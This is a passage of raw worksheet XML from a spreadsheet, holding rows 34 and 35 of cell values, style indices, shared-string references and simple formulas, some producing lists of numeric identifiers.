      <c r="NR33" s="127"/>
      <c r="NS33" s="127"/>
      <c r="NT33" s="127"/>
      <c r="NU33" s="127"/>
      <c r="NV33" s="127"/>
      <c r="NW33" s="127"/>
      <c r="NX33" s="127"/>
      <c r="NY33" s="127"/>
    </row>
    <row r="34" ht="153.75" customHeight="1">
      <c r="B34" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C34" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D34" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E34" s="90" t="s">
        <v>805</v>
      </c>
      <c r="F34" s="90" t="s">
        <v>806</v>
      </c>
      <c r="G34" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H34" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I34" s="92" t="s">
        <v>807</v>
      </c>
      <c r="J34" s="92" t="s">
        <v>808</v>
      </c>
      <c r="K34" s="92" t="s">
        <v>809</v>
      </c>
      <c r="L34" s="93" t="s">
        <v>399</v>
      </c>
      <c r="M34" s="93">
        <v>7.0</v>
      </c>
      <c r="N34" s="93">
        <v>1.0</v>
      </c>
      <c r="O34" s="93">
        <v>0.0</v>
      </c>
      <c r="P34" s="93">
        <v>1.0</v>
      </c>
      <c r="Q34" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R34" s="93">
        <v>1.0</v>
      </c>
      <c r="S34" s="93">
        <v>0.0</v>
      </c>
      <c r="T34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U34" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V34" s="96" t="s">
        <v>810</v>
      </c>
      <c r="W34" s="96" t="s">
        <v>811</v>
      </c>
      <c r="X34" s="126" t="s">
        <v>812</v>
      </c>
      <c r="Y34" s="126" t="s">
        <v>813</v>
      </c>
      <c r="Z34" s="132" t="s">
        <v>814</v>
      </c>
      <c r="AA34" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB34" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC34" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD34" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE34" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF34" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG34" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH34" s="99" t="s">
        <v>815</v>
      </c>
      <c r="AI34" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ34" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL34" s="100">
        <v>0.0</v>
      </c>
      <c r="AM34" s="100">
        <v>0.0</v>
      </c>
      <c r="AN34" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP34" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ34" s="100">
        <v>0.0</v>
      </c>
      <c r="AR34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT34" s="100" t="str">
        <f>IF(AR34="-",AS34,AR34)</f>
        <v>-</v>
      </c>
      <c r="AU34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX34" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY34" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ34" s="100">
        <v>0.0</v>
      </c>
      <c r="BA34" s="102">
        <v>7.0</v>
      </c>
      <c r="BB34" s="102">
        <v>0.0</v>
      </c>
      <c r="BC34" s="102">
        <v>0.0</v>
      </c>
      <c r="BD34" s="102">
        <v>0.0</v>
      </c>
      <c r="BE34" s="102">
        <v>0.0</v>
      </c>
      <c r="BF34" s="102">
        <v>0.0</v>
      </c>
      <c r="BG34" s="102">
        <v>0.0</v>
      </c>
      <c r="BH34" s="102">
        <v>0.0</v>
      </c>
      <c r="BI34" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ34" s="102">
        <v>0.0</v>
      </c>
      <c r="BK34" s="102">
        <v>0.0</v>
      </c>
      <c r="BL34" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM34" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN34" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO34" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP34" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ34" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR34" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS34" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT34" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU34" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV34" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW34" s="104" t="s">
        <v>816</v>
      </c>
      <c r="BX34" s="104">
        <v>2.0</v>
      </c>
      <c r="BY34" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ34" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA34" s="104" t="s">
        <v>816</v>
      </c>
      <c r="CB34" s="104">
        <v>2.0</v>
      </c>
      <c r="CC34" s="104">
        <v>4.0</v>
      </c>
      <c r="CD34" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE34" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF34" s="104" t="str">
        <f t="shared" si="73"/>
        <v>-</v>
      </c>
      <c r="CG34" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH34" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI34" s="104" t="s">
        <v>816</v>
      </c>
      <c r="CJ34" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK34" s="104">
        <v>1.0</v>
      </c>
      <c r="CL34" s="104">
        <v>4.0</v>
      </c>
      <c r="CM34" s="105">
        <v>7.0</v>
      </c>
      <c r="CN34" s="105">
        <v>4.0</v>
      </c>
      <c r="CO34" s="105">
        <v>4.0</v>
      </c>
      <c r="CP34" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ34" s="105">
        <v>4.0</v>
      </c>
      <c r="CR34" s="105">
        <v>4.0</v>
      </c>
      <c r="CS34" s="105">
        <v>0.0</v>
      </c>
      <c r="CT34" s="105">
        <v>0.0</v>
      </c>
      <c r="CU34" s="105">
        <v>0.0</v>
      </c>
      <c r="CV34" s="105">
        <v>0.0</v>
      </c>
      <c r="CW34" s="105">
        <v>4.0</v>
      </c>
      <c r="CX34" s="105">
        <v>4.0</v>
      </c>
      <c r="CY34" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ34" s="105">
        <v>4.0</v>
      </c>
      <c r="DA34" s="105">
        <v>4.0</v>
      </c>
      <c r="DB34" s="106">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="DC34" s="106">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="DD34" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE34" s="106">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="DF34" s="106">
        <f t="shared" si="19"/>
        <v>4</v>
      </c>
      <c r="DG34" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH34" s="106">
        <f t="shared" si="21"/>
        <v>4</v>
      </c>
      <c r="DI34" s="106">
        <f t="shared" si="22"/>
        <v>4</v>
      </c>
      <c r="DJ34" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK34" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL34" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM34" s="108" t="s">
        <v>816</v>
      </c>
      <c r="DN34" s="108">
        <v>2.0</v>
      </c>
      <c r="DO34" s="108">
        <v>4.0</v>
      </c>
      <c r="DP34" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ34" s="108" t="s">
        <v>816</v>
      </c>
      <c r="DR34" s="108">
        <v>2.0</v>
      </c>
      <c r="DS34" s="108">
        <v>4.0</v>
      </c>
      <c r="DT34" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU34" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV34" s="108" t="str">
        <f t="shared" si="85"/>
        <v>-</v>
      </c>
      <c r="DW34" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX34" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY34" s="108" t="s">
        <v>816</v>
      </c>
      <c r="DZ34" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA34" s="108">
        <v>2.0</v>
      </c>
      <c r="EB34" s="108">
        <v>4.0</v>
      </c>
      <c r="EC34" s="109">
        <v>7.0</v>
      </c>
      <c r="ED34" s="109">
        <v>4.0</v>
      </c>
      <c r="EE34" s="109">
        <v>4.0</v>
      </c>
      <c r="EF34" s="109">
        <v>0.0</v>
      </c>
      <c r="EG34" s="109">
        <v>4.0</v>
      </c>
      <c r="EH34" s="109">
        <v>4.0</v>
      </c>
      <c r="EI34" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ34" s="109">
        <v>0.0</v>
      </c>
      <c r="EK34" s="109">
        <v>0.0</v>
      </c>
      <c r="EL34" s="109">
        <v>0.0</v>
      </c>
      <c r="EM34" s="109">
        <v>4.0</v>
      </c>
      <c r="EN34" s="109">
        <v>4.0</v>
      </c>
      <c r="EO34" s="109">
        <v>0.0</v>
      </c>
      <c r="EP34" s="109">
        <v>4.0</v>
      </c>
      <c r="EQ34" s="109">
        <v>4.0</v>
      </c>
      <c r="ER34" s="110">
        <f t="shared" si="27"/>
        <v>4</v>
      </c>
      <c r="ES34" s="110">
        <f t="shared" si="28"/>
        <v>4</v>
      </c>
      <c r="ET34" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU34" s="110">
        <f t="shared" si="30"/>
        <v>4</v>
      </c>
      <c r="EV34" s="110">
        <f t="shared" si="31"/>
        <v>4</v>
      </c>
      <c r="EW34" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX34" s="110">
        <f t="shared" si="33"/>
        <v>4</v>
      </c>
      <c r="EY34" s="110">
        <f t="shared" si="34"/>
        <v>4</v>
      </c>
      <c r="EZ34" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA34" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB34" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC34" s="111" t="s">
        <v>817</v>
      </c>
      <c r="FD34" s="111">
        <v>8.0</v>
      </c>
      <c r="FE34" s="111">
        <v>14.0</v>
      </c>
      <c r="FF34" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG34" s="111" t="s">
        <v>818</v>
      </c>
      <c r="FH34" s="111">
        <v>6.0</v>
      </c>
      <c r="FI34" s="111">
        <v>10.0</v>
      </c>
      <c r="FJ34" s="111" t="s">
        <v>817</v>
      </c>
      <c r="FK34" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL34" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749, 2000418, 2011803, 2003303, 2003410, 2014906, 2027768</v>
      </c>
      <c r="FM34" s="111" t="s">
        <v>819</v>
      </c>
      <c r="FN34" s="111" t="s">
        <v>820</v>
      </c>
      <c r="FO34" s="111" t="s">
        <v>816</v>
      </c>
      <c r="FP34" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ34" s="111">
        <v>2.0</v>
      </c>
      <c r="FR34" s="111">
        <v>4.0</v>
      </c>
      <c r="FS34" s="112">
        <v>7.0</v>
      </c>
      <c r="FT34" s="112">
        <v>5.0</v>
      </c>
      <c r="FU34" s="112">
        <v>12.0</v>
      </c>
      <c r="FV34" s="112">
        <v>0.0</v>
      </c>
      <c r="FW34" s="112">
        <v>14.0</v>
      </c>
      <c r="FX34" s="112">
        <v>14.0</v>
      </c>
      <c r="FY34" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ34" s="112">
        <v>0.0</v>
      </c>
      <c r="GA34" s="112">
        <v>1.0</v>
      </c>
      <c r="GB34" s="112">
        <v>1.0</v>
      </c>
      <c r="GC34" s="112">
        <v>4.0</v>
      </c>
      <c r="GD34" s="112">
        <v>10.0</v>
      </c>
      <c r="GE34" s="112">
        <v>0.0</v>
      </c>
      <c r="GF34" s="112">
        <v>10.0</v>
      </c>
      <c r="GG34" s="112">
        <v>10.0</v>
      </c>
      <c r="GH34" s="113">
        <f t="shared" si="39"/>
        <v>5</v>
      </c>
      <c r="GI34" s="113">
        <f t="shared" si="40"/>
        <v>4</v>
      </c>
      <c r="GJ34" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK34" s="113">
        <f t="shared" si="42"/>
        <v>12</v>
      </c>
      <c r="GL34" s="113">
        <f t="shared" si="43"/>
        <v>10</v>
      </c>
      <c r="GM34" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN34" s="113">
        <f t="shared" si="45"/>
        <v>14</v>
      </c>
      <c r="GO34" s="113">
        <f t="shared" si="46"/>
        <v>10</v>
      </c>
      <c r="GP34" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ34" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR34" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS34" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT34" s="94"/>
      <c r="GU34" s="116">
        <v>8064362.0</v>
      </c>
      <c r="GV34" s="116">
        <v>1.0</v>
      </c>
      <c r="GW34" s="116">
        <v>2.0</v>
      </c>
      <c r="GX34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD34" s="131">
        <v>8064362.0</v>
      </c>
      <c r="HE34" s="131">
        <v>8064362.0</v>
      </c>
      <c r="HF34" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG34" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH34" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI34" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ34" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK34" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL34" s="93">
        <v>3.0</v>
      </c>
      <c r="HM34" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN34" s="93">
        <v>1.0</v>
      </c>
      <c r="HO34" s="93">
        <v>0.0</v>
      </c>
      <c r="HP34" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ34" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR34" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS34" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT34" s="139" t="s">
        <v>443</v>
      </c>
      <c r="HU34" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV34" s="119" t="s">
        <v>821</v>
      </c>
      <c r="HW34" s="119">
        <v>2.0</v>
      </c>
      <c r="HX34" s="119">
        <v>3.0</v>
      </c>
      <c r="HY34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC34" s="120" t="str">
        <f t="shared" ref="IC34:IC41" si="88">HV34</f>
        <v>655989849, 52175</v>
      </c>
      <c r="ID34" s="120" t="s">
        <v>821</v>
      </c>
      <c r="IE34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH34" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II34" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ34" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK34" s="99">
        <v>5.0</v>
      </c>
      <c r="IL34" s="99">
        <v>1.0</v>
      </c>
      <c r="IM34" s="121">
        <f t="shared" si="57"/>
        <v>1</v>
      </c>
      <c r="IN34" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO34" s="98">
        <v>1.0</v>
      </c>
      <c r="IP34" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ34" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR34" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS34" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT34" s="127"/>
      <c r="IU34" s="127"/>
      <c r="IV34" s="127"/>
      <c r="IW34" s="127"/>
      <c r="IX34" s="127"/>
      <c r="IY34" s="127"/>
      <c r="IZ34" s="127"/>
      <c r="JA34" s="127"/>
      <c r="JB34" s="127"/>
      <c r="JC34" s="127"/>
      <c r="JD34" s="127"/>
      <c r="JE34" s="127"/>
      <c r="JF34" s="127"/>
      <c r="JG34" s="127"/>
      <c r="JH34" s="127"/>
      <c r="JI34" s="127"/>
      <c r="JJ34" s="127"/>
      <c r="JK34" s="127"/>
      <c r="JL34" s="127"/>
      <c r="JM34" s="127"/>
      <c r="JN34" s="127"/>
      <c r="JO34" s="127"/>
      <c r="JP34" s="127"/>
      <c r="JQ34" s="127"/>
      <c r="JR34" s="127"/>
      <c r="JS34" s="127"/>
      <c r="JT34" s="127"/>
      <c r="JU34" s="127"/>
      <c r="JV34" s="127"/>
      <c r="JW34" s="127"/>
      <c r="JX34" s="127"/>
      <c r="JY34" s="127"/>
      <c r="JZ34" s="127"/>
      <c r="KA34" s="127"/>
      <c r="KB34" s="127"/>
      <c r="KC34" s="127"/>
      <c r="KD34" s="127"/>
      <c r="KE34" s="127"/>
      <c r="KF34" s="127"/>
      <c r="KG34" s="127"/>
      <c r="KH34" s="127"/>
      <c r="KI34" s="127"/>
      <c r="KJ34" s="127"/>
      <c r="KK34" s="127"/>
      <c r="KL34" s="127"/>
      <c r="KM34" s="127"/>
      <c r="KN34" s="127"/>
      <c r="KO34" s="127"/>
      <c r="KP34" s="127"/>
      <c r="KQ34" s="127"/>
      <c r="KR34" s="127"/>
      <c r="KS34" s="127"/>
      <c r="KT34" s="127"/>
      <c r="KU34" s="127"/>
      <c r="KV34" s="127"/>
      <c r="KW34" s="127"/>
      <c r="KX34" s="127"/>
      <c r="KY34" s="127"/>
      <c r="KZ34" s="127"/>
      <c r="LA34" s="127"/>
      <c r="LB34" s="127"/>
      <c r="LC34" s="127"/>
      <c r="LD34" s="127"/>
      <c r="LE34" s="127"/>
      <c r="LF34" s="127"/>
      <c r="LG34" s="127"/>
      <c r="LH34" s="127"/>
      <c r="LI34" s="127"/>
      <c r="LJ34" s="127"/>
      <c r="LK34" s="127"/>
      <c r="LL34" s="127"/>
      <c r="LM34" s="127"/>
      <c r="LN34" s="127"/>
      <c r="LO34" s="127"/>
      <c r="LP34" s="127"/>
      <c r="LQ34" s="127"/>
      <c r="LR34" s="127"/>
      <c r="LS34" s="127"/>
      <c r="LT34" s="127"/>
      <c r="LU34" s="127"/>
      <c r="LV34" s="127"/>
      <c r="LW34" s="127"/>
      <c r="LX34" s="127"/>
      <c r="LY34" s="127"/>
      <c r="LZ34" s="127"/>
      <c r="MA34" s="127"/>
      <c r="MB34" s="127"/>
      <c r="MC34" s="127"/>
      <c r="MD34" s="127"/>
      <c r="ME34" s="127"/>
      <c r="MF34" s="127"/>
      <c r="MG34" s="127"/>
      <c r="MH34" s="127"/>
      <c r="MI34" s="127"/>
      <c r="MJ34" s="127"/>
      <c r="MK34" s="127"/>
      <c r="ML34" s="127"/>
      <c r="MM34" s="127"/>
      <c r="MN34" s="127"/>
      <c r="MO34" s="127"/>
      <c r="MP34" s="127"/>
      <c r="MQ34" s="127"/>
      <c r="MR34" s="127"/>
      <c r="MS34" s="127"/>
      <c r="MT34" s="127"/>
      <c r="MU34" s="127"/>
      <c r="MV34" s="127"/>
      <c r="MW34" s="127"/>
      <c r="MX34" s="127"/>
      <c r="MY34" s="127"/>
      <c r="MZ34" s="127"/>
      <c r="NA34" s="127"/>
      <c r="NB34" s="127"/>
      <c r="NC34" s="127"/>
      <c r="ND34" s="127"/>
      <c r="NE34" s="127"/>
      <c r="NF34" s="127"/>
      <c r="NG34" s="127"/>
      <c r="NH34" s="127"/>
      <c r="NI34" s="127"/>
      <c r="NJ34" s="127"/>
      <c r="NK34" s="127"/>
      <c r="NL34" s="127"/>
      <c r="NM34" s="127"/>
      <c r="NN34" s="127"/>
      <c r="NO34" s="127"/>
      <c r="NP34" s="127"/>
      <c r="NQ34" s="127"/>
      <c r="NR34" s="127"/>
      <c r="NS34" s="127"/>
      <c r="NT34" s="127"/>
      <c r="NU34" s="127"/>
      <c r="NV34" s="127"/>
      <c r="NW34" s="127"/>
      <c r="NX34" s="127"/>
      <c r="NY34" s="127"/>
    </row>
    <row r="35" ht="153.75" customHeight="1">
      <c r="B35" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C35" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D35" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E35" s="90" t="s">
        <v>822</v>
      </c>
      <c r="F35" s="90" t="s">
        <v>823</v>
      </c>
      <c r="G35" s="90" t="s">
        <v>824</v>
      </c>
      <c r="H35" s="90" t="s">
        <v>825</v>
      </c>
      <c r="I35" s="92" t="s">
        <v>826</v>
      </c>
      <c r="J35" s="92" t="s">
        <v>827</v>
      </c>
      <c r="K35" s="92" t="s">
        <v>828</v>
      </c>
      <c r="L35" s="93" t="s">
        <v>450</v>
      </c>
      <c r="M35" s="93">
        <v>1.0</v>
      </c>
      <c r="N35" s="93">
        <v>1.0</v>
      </c>
      <c r="O35" s="93">
        <v>0.0</v>
      </c>
      <c r="P35" s="93">
        <v>1.0</v>
      </c>
      <c r="Q35" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R35" s="93">
        <v>1.0</v>
      </c>
      <c r="S35" s="93">
        <v>0.0</v>
      </c>
      <c r="T35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U35" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V35" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W35" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X35" s="97" t="s">
        <v>829</v>
      </c>
      <c r="Y35" s="96" t="s">
        <v>830</v>
      </c>
      <c r="Z35" s="96" t="s">
        <v>831</v>
      </c>
      <c r="AA35" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB35" s="95" t="s">
        <v>455</v>
      </c>
      <c r="AC35" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD35" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE35" s="95" t="s">
        <v>456</v>
      </c>
      <c r="AF35" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG35" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH35" s="99" t="s">
        <v>832</v>
      </c>
      <c r="AI35" s="99" t="s">
        <v>833</v>
      </c>
      <c r="AJ35" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL35" s="100">
        <v>0.0</v>
      </c>
      <c r="AM35" s="100">
        <v>0.0</v>
      </c>
      <c r="AN35" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP35" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ35" s="100">
        <v>0.0</v>
      </c>
      <c r="AR35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX35" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY35" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ35" s="100">
        <v>0.0</v>
      </c>
      <c r="BA35" s="102">
        <v>0.0</v>
      </c>
      <c r="BB35" s="102">
        <v>0.0</v>
      </c>
      <c r="BC35" s="102">
        <v>0.0</v>
      </c>
      <c r="BD35" s="102">
        <v>0.0</v>
      </c>
      <c r="BE35" s="102">
        <v>0.0</v>
      </c>
      <c r="BF35" s="102">
        <v>0.0</v>
      </c>
      <c r="BG35" s="102">
        <v>0.0</v>
      </c>
      <c r="BH35" s="102">
        <v>0.0</v>
      </c>
      <c r="BI35" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ35" s="102">
        <v>0.0</v>
      </c>
      <c r="BK35" s="102">
        <v>0.0</v>
      </c>
      <c r="BL35" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM35" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN35" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO35" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP35" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ35" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR35" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS35" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT35" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU35" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV35" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX35" s="104">
        <v>0.0</v>
      </c>
      <c r="BY35" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ35" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB35" s="104">
        <v>0.0</v>
      </c>
      <c r="CC35" s="104">
        <v>0.0</v>
      </c>
      <c r="CD35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ35" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK35" s="104">
        <v>0.0</v>
      </c>
      <c r="CL35" s="104">
        <v>0.0</v>
      </c>
      <c r="CM35" s="105">
        <v>0.0</v>
      </c>
      <c r="CN35" s="105">
        <v>0.0</v>
      </c>
      <c r="CO35" s="105">
        <v>0.0</v>
      </c>
      <c r="CP35" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ35" s="105">
        <v>0.0</v>
      </c>
      <c r="CR35" s="105">
        <v>0.0</v>
      </c>
      <c r="CS35" s="105">
        <v>0.0</v>
      </c>
      <c r="CT35" s="105">
        <v>0.0</v>
      </c>
      <c r="CU35" s="105">
        <v>0.0</v>
      </c>
      <c r="CV35" s="105">
        <v>0.0</v>
      </c>
      <c r="CW35" s="105">
        <v>0.0</v>
      </c>
      <c r="CX35" s="105">
        <v>0.0</v>
      </c>
      <c r="CY35" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ35" s="105">
        <v>0.0</v>
      </c>
      <c r="DA35" s="105">
        <v>0.0</v>
      </c>
      <c r="DB35" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC35" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD35" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE35" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF35" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG35" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH35" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI35" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ35" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK35" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL35" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM35" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN35" s="108">
        <v>0.0</v>
      </c>
      <c r="DO35" s="108">
        <v>0.0</v>
      </c>
      <c r="DP35" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ35" s="108" t="s">
        <v>12</v>
      </c>
